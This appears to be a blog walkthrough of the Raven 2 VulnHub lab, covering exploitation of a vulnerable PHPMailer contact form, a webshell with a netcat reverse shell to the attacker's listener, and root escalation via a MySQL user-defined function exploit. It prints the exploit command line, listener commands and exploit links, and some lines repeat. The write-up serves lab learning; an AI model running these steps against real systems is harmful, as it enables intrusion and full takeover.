https://www.vulnhub.com/entry/raven-2,269/
1. We do the usual scan for the IP address. Then, we do a service scan.
1. We do the usual scan for the IP address. Then, we do a service scan.
3. AHhhh. We have the same logins as before. Maybe the same passwords work. Nope. Dead End.
I could not login with the old RAVEN 1 passwords.
4. From the files, it looks like there is phpmailer installation that has a vulnerable version. A google and exploit-db search find a possible exploit for the vulnerability.
https://www.exploit-db.com/exploits/40969/
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
5. After reading the exploit, I check to find all the required settings/pages for it to work. We have the contact page. We have the parameters from the web page in order to run the exploit code.
6. Look at the script. You may have to update a default parameter in order for it to work.
parser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST "action" field name', default="send")
parser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST "name of sender" field name', default="name")
parser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST "email" field name', default="email")
parser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST "message" field name', default="msg")
7. So now, I run the code in order to create the webshell. I just use netcat to open a connection on port 80.
sudo nc -lvvp 80
python raven2.py -url http://raven.local/ -d vendor -cf contact.php -ip 192.168.126.1 -p 80 --post-msg message
http://raven.local/vendor/phpbackdoor7270.php
http://raven.local/vendor/phpbackdoor7270.php
8. Now, I have a shell. I just continue to look around and note all the changes to the box from Raven 1.
9. While looking around, I view some flags and take screenshots.
10. Also, I used the LinEnum.sh and linux priv checker scripts to find out more information about the box. I took note of /var/mail.
It has michael and www-data which I thought was weird. I didn't see anything there. Probably missed something.
11. Need an interactive shell. I first found out how to upgrade a shell by following ippsec. Check out his youtube. Googled exactly how.
11. Need an interactive shell. I first found out how to upgrade a shell by following ippsec. Check out his youtube. Googled exactly how.
https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell
stty raw -echo
12. Now that we have the interactive shell, I can log into mysql. I can check the tables, databases and users.
13. Password didn’t work for Michael or steven. Well we have access to mysql. It is running as root from LinEnum and linux priv checker. We should be able to use that.
https://payatu.com/guide-linux-privilege-escalation/
https://www.exploit-db.com/exploits/1518/
https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/
-- Side Note. If you cannot compile the exploit on the box, just use another VM and compile it there. Use a wget if it is there to transfer the compiled file on the vulnerable box.
14. Now, this is where I f'd up. I was able to setup a do_system function but I ran the wrong command which broke the shell. Time to start that back up. This time I will run the right command using netcat to send a shell back to my box as root. There is flag4 and game over.
No comments:
Post a Comment